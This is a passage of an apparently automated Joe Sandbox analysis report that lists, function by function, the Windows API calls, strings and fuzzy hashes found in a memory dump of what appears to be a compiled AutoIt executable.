                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: TextWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 530164218-0
                                                                                                                  • Opcode ID: dfedd1a73314fc93b2441540671bb9759139aa6c431364e63d60d472fe19c962
                                                                                                                  • Instruction ID: c3611c7fdf7b2fd15a6f4e6d316b4dbaf54e4161d46e6a1c58361e28146062e2
                                                                                                                  • Opcode Fuzzy Hash: dfedd1a73314fc93b2441540671bb9759139aa6c431364e63d60d472fe19c962
                                                                                                                  • Instruction Fuzzy Hash: 44D067362146189F8701AB99D848C957BEAEB4D6107058055F509DB231D661E854ABA1
                                                                                                                  APIs
                                                                                                                  • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,00DE49DA,?,?,00000000), ref: 00D74FC4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FilePointer
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 973152223-0
                                                                                                                  • Opcode ID: 05f7f9ff5ad0e360fccecf34c64dc5386eb946acca2865c986c92493f0e230f0
                                                                                                                  • Instruction ID: 7c0108071d5f6a7da06e7e183a6222e8bffd6db9ccf41846ac66f6de249a5643
                                                                                                                  • Opcode Fuzzy Hash: 05f7f9ff5ad0e360fccecf34c64dc5386eb946acca2865c986c92493f0e230f0
                                                                                                                  • Instruction Fuzzy Hash: C5D0C974640308BFEB00CB90DC46FAA7BBDEB04718F200194F600A62D0D2F2BE408B65
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClearVariant
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1473721057-0
                                                                                                                  • Opcode ID: 925bb21b8855431446343c14c87e82c9f7085debf6cea5c632b62fe6d402cc72
                                                                                                                  • Instruction ID: a5ffc7cfa315e89652da69f384d8c828f29b1d5de5778ae5edae7fef016156ad
                                                                                                                  • Opcode Fuzzy Hash: 925bb21b8855431446343c14c87e82c9f7085debf6cea5c632b62fe6d402cc72
                                                                                                                  • Instruction Fuzzy Hash: C3D0C9B1500201DBEB206F69E80475ABBE5AF51300F24C829E9C6C2250D7B6E8C29B31
                                                                                                                  APIs
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00D750BE,?,00D75088,?,00D7BE3D,00E322E8,?,00000000,?,00D73E2E,?,00000000,?), ref: 00D7510C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseHandle
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2962429428-0
                                                                                                                  • Opcode ID: 42ab60a2f9e1232402dea35994973e55d2c3352daa77c06c8de46fc2ae64fef7
                                                                                                                  • Instruction ID: b01938b937b3b2e04e94f8adeeb2f83309aafc72af52b80f4b08d492583c5fc4
                                                                                                                  • Opcode Fuzzy Hash: 42ab60a2f9e1232402dea35994973e55d2c3352daa77c06c8de46fc2ae64fef7
                                                                                                                  • Instruction Fuzzy Hash: E0E0B679400B02CBC2314F1AE804412FBF5FFE13613258A2FD4E9826A4E7B05486DBA1
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00DDAFDB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend
                                                                                                                  • String ID: %d/%02d/%02d
                                                                                                                  • API String ID: 3850602802-328681919
                                                                                                                  • Opcode ID: 62b01171fc96c8e1fd4faa867f4ba6e165ba6749314314a38afc643e3672b5ad
                                                                                                                  • Instruction ID: e56ba2e626b1fe9caf5ee199a76f7acc96ca28f703d4ae7ebe7f9de1a523d5a0
                                                                                                                  • Opcode Fuzzy Hash: 62b01171fc96c8e1fd4faa867f4ba6e165ba6749314314a38afc643e3672b5ad
                                                                                                                  • Instruction Fuzzy Hash: 1B129DB1500308ABEB258F68CC49FAE7BB9EF45310F14825AF559EB391DB748941CB72
                                                                                                                  APIs
                                                                                                                  • GetForegroundWindow.USER32(00000000,00000000), ref: 00D8F796
                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DE4388
                                                                                                                  • IsIconic.USER32(000000FF), ref: 00DE4391
                                                                                                                  • ShowWindow.USER32(000000FF,00000009), ref: 00DE439E
                                                                                                                  • SetForegroundWindow.USER32(000000FF), ref: 00DE43A8
                                                                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00DE43BE
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00DE43C5
                                                                                                                  • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00DE43D1
                                                                                                                  • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00DE43E2
                                                                                                                  • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00DE43EA
                                                                                                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 00DE43F2
                                                                                                                  • SetForegroundWindow.USER32(000000FF), ref: 00DE43F5
                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DE440A
                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00DE4415
                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DE441F
                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00DE4424
                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DE442D
                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00DE4432
                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DE443C
                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00DE4441
                                                                                                                  • SetForegroundWindow.USER32(000000FF), ref: 00DE4444
                                                                                                                  • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00DE446B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                  • API String ID: 4125248594-2988720461
                                                                                                                  • Opcode ID: a9be6a1e240a2bc902ec6f66064105e2de8cc05f4a1d45affabb92414f76757f
                                                                                                                  • Instruction ID: 1e6782e26540d318a8e03924db380382b8cdddedfbdb2f3020667fc29fee1d58
                                                                                                                  • Opcode Fuzzy Hash: a9be6a1e240a2bc902ec6f66064105e2de8cc05f4a1d45affabb92414f76757f
                                                                                                                  • Instruction Fuzzy Hash: D7315271A40358BBEB216B729C49F7F3E6EEB44B50F108015FA05EA2D0C6B09901EAB0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D7CAEE: _memmove.LIBCMT ref: 00D7CB2F
                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,00E322E8,?,00000000,?,00D73E2E,?,00000000,?,00E0DBF0,00000000,?), ref: 00D7BE8B
                                                                                                                  • GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00D73E2E,?,00000000,?,00E0DBF0,00000000,?,00000002), ref: 00D7BEA7
                                                                                                                  • __wsplitpath.LIBCMT ref: 00D7BF19
                                                                                                                    • Part of subcall function 00D9297D: __wsplitpath_helper.LIBCMT ref: 00D929BD
                                                                                                                  • _wcscpy.LIBCMT ref: 00D7BF31
                                                                                                                  • _wcscat.LIBCMT ref: 00D7BF46
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00D7BF56
                                                                                                                  • _wcscpy.LIBCMT ref: 00D7C03E
                                                                                                                  • _wcscpy.LIBCMT ref: 00D7C1ED
                                                                                                                  • SetCurrentDirectoryW.KERNEL32 ref: 00D7C250
                                                                                                                    • Part of subcall function 00D9010A: std::exception::exception.LIBCMT ref: 00D9013E
                                                                                                                    • Part of subcall function 00D9010A: __CxxThrowException@8.LIBCMT ref: 00D90153
                                                                                                                    • Part of subcall function 00D7C320: _memmove.LIBCMT ref: 00D7C419
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentDirectory_wcscpy$_memmove$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_wcscatstd::exception::exception
                                                                                                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string$_$"
                                                                                                                  • API String ID: 2542276039-3082565913
                                                                                                                  • Opcode ID: d598c76974303ab711b41c34f99fb2d63919c34139bf0aeb304242f6cc4819e4
                                                                                                                  • Instruction ID: 12f3eebb593bce440b4c8ae98db66b423ad20d3d7c09478b346a5bc97efe872f
                                                                                                                  • Opcode Fuzzy Hash: d598c76974303ab711b41c34f99fb2d63919c34139bf0aeb304242f6cc4819e4
                                                                                                                  • Instruction Fuzzy Hash: 48427F715083459FD710EF60D885BABB7E8EF94300F44892DF58997252EB31EA49CBB2
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D731B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00D731DA
                                                                                                                    • Part of subcall function 00DB7B9F: __wsplitpath.LIBCMT ref: 00DB7BBC
                                                                                                                    • Part of subcall function 00DB7B9F: __wsplitpath.LIBCMT ref: 00DB7BCF
                                                                                                                    • Part of subcall function 00DB7C0C: GetFileAttributesW.KERNEL32(?,00DB6A7B), ref: 00DB7C0D
                                                                                                                  • _wcscat.LIBCMT ref: 00DB6B9D
                                                                                                                  • _wcscat.LIBCMT ref: 00DB6BBB
                                                                                                                  • __wsplitpath.LIBCMT ref: 00DB6BE2
                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00DB6BF8
                                                                                                                  • _wcscpy.LIBCMT ref: 00DB6C57
                                                                                                                  • _wcscat.LIBCMT ref: 00DB6C6A
                                                                                                                  • _wcscat.LIBCMT ref: 00DB6C7D
                                                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00DB6CAB
                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00DB6CBC
                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00DB6CDB
                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00DB6CEA
                                                                                                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 00DB6CFF
                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00DB6D10
                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DB6D37
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00DB6D53
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00DB6D61
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
                                                                                                                  • String ID: \*.*
                                                                                                                  • API String ID: 1867810238-1173974218
                                                                                                                  • Opcode ID: c782c911820b0f4193a44135a637d3ebce6af52e5ee03b4034c94e7c09acd14b
                                                                                                                  • Instruction ID: db5bb0e652948ac76d1b87f3381c89cde73d0471ee23b63240858f0e39f476e9
                                                                                                                  • Opcode Fuzzy Hash: c782c911820b0f4193a44135a637d3ebce6af52e5ee03b4034c94e7c09acd14b
                                                                                                                  • Instruction Fuzzy Hash: 2E510F72904258AADF21DBA0CC45EEE777DAF09304F4845DAE55AE2141EB34DB88CF71
                                                                                                                  APIs
                                                                                                                  • OpenClipboard.USER32(00E0DBF0), ref: 00DC70C3
                                                                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 00DC70D1
                                                                                                                  • GetClipboardData.USER32(0000000D), ref: 00DC70D9
                                                                                                                  • CloseClipboard.USER32 ref: 00DC70E5
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00DC7101
                                                                                                                  • CloseClipboard.USER32 ref: 00DC710B
                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00DC7120
                                                                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 00DC712D
                                                                                                                  • GetClipboardData.USER32(00000001), ref: 00DC7135
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00DC7142
                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00DC7176
                                                                                                                  • CloseClipboard.USER32 ref: 00DC7283
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3222323430-0
                                                                                                                  • Opcode ID: 3b2075e167788a81cc95ab907fd21f5d34f0cd508b9f80e0ef969d61e964ec83
                                                                                                                  • Instruction ID: 1287ace438f8ece23c658529113af051fa941c9053392bbb20b7ff832b5c2b6b
                                                                                                                  • Opcode Fuzzy Hash: 3b2075e167788a81cc95ab907fd21f5d34f0cd508b9f80e0ef969d61e964ec83
                                                                                                                  • Instruction Fuzzy Hash: 83518E31208306ABD311AB64DC86F7EB7AAAB84B11F04851DF54AD72D1EB70D905DB72
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DABEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00DABF0F
                                                                                                                    • Part of subcall function 00DABEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00DABF3C
                                                                                                                    • Part of subcall function 00DABEC3: GetLastError.KERNEL32 ref: 00DABF49
                                                                                                                  • _memset.LIBCMT ref: 00DABA34
                                                                                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00DABA86
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00DABA97
                                                                                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00DABAAE
                                                                                                                  • GetProcessWindowStation.USER32 ref: 00DABAC7
                                                                                                                  • SetProcessWindowStation.USER32(00000000), ref: 00DABAD1
                                                                                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00DABAEB
                                                                                                                    • Part of subcall function 00DAB8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00DAB9EC), ref: 00DAB8C5
                                                                                                                    • Part of subcall function 00DAB8B0: CloseHandle.KERNEL32(?,?,00DAB9EC), ref: 00DAB8D7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                  • String ID: $default$winsta0
                                                                                                                  • API String ID: 2063423040-1027155976
                                                                                                                  • Opcode ID: 377a5924e0a82e5266e9c0a377086fdb8dbc759b88c934cd71586bd76f37e205
                                                                                                                  • Instruction ID: 36febcd10c61f042952bd0356d6917c9a2595af7bf103c06eedc4ffb035958e1
                                                                                                                  • Opcode Fuzzy Hash: 377a5924e0a82e5266e9c0a377086fdb8dbc759b88c934cd71586bd76f37e205
                                                                                                                  • Instruction Fuzzy Hash: 98818071800209AFDF119FA4DD45EFEBB79EF05324F18811AF915A6252DB318E16EB31
                                                                                                                  APIs
                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00DBFE03
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00DBFE57
                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00DBFE7C
                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00DBFE93
                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00DBFEBA
                                                                                                                  • __swprintf.LIBCMT ref: 00DBFF06
                                                                                                                  • __swprintf.LIBCMT ref: 00DBFF3F
                                                                                                                    • Part of subcall function 00D7CAEE: _memmove.LIBCMT ref: 00D7CB2F
                                                                                                                  • __swprintf.LIBCMT ref: 00DBFF93
                                                                                                                    • Part of subcall function 00D9234B: __woutput_l.LIBCMT ref: 00D923A4
                                                                                                                  • __swprintf.LIBCMT ref: 00DBFFE1
                                                                                                                  • __swprintf.LIBCMT ref: 00DC0030
                                                                                                                  • __swprintf.LIBCMT ref: 00DC007F
                                                                                                                  • __swprintf.LIBCMT ref: 00DC00CE
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l_memmove
                                                                                                                  • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                  • API String ID: 108614129-2428617273
                                                                                                                  • Opcode ID: 4758cb4bc5ff31ae5baefa74732437f057088c0b18258d4b2682fc14421ba610
                                                                                                                  • Instruction ID: 948ac366e422c14e33c827fa552811992cc25fdf0e242d2ce3394038936460aa
                                                                                                                  • Opcode Fuzzy Hash: 4758cb4bc5ff31ae5baefa74732437f057088c0b18258d4b2682fc14421ba610
                                                                                                                  • Instruction Fuzzy Hash: 61A1F9B2418344ABC311EBA4C896DBFB7EDEF98700F44495DB585C2151EB34EA49CBB2
                                                                                                                  APIs
                                                                                                                  • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00DC2065
                                                                                                                  • _wcscmp.LIBCMT ref: 00DC207A
                                                                                                                  • _wcscmp.LIBCMT ref: 00DC2091
                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00DC20A3
                                                                                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 00DC20BD
                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00DC20D5
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00DC20E0
                                                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00DC20FC
                                                                                                                  • _wcscmp.LIBCMT ref: 00DC2123
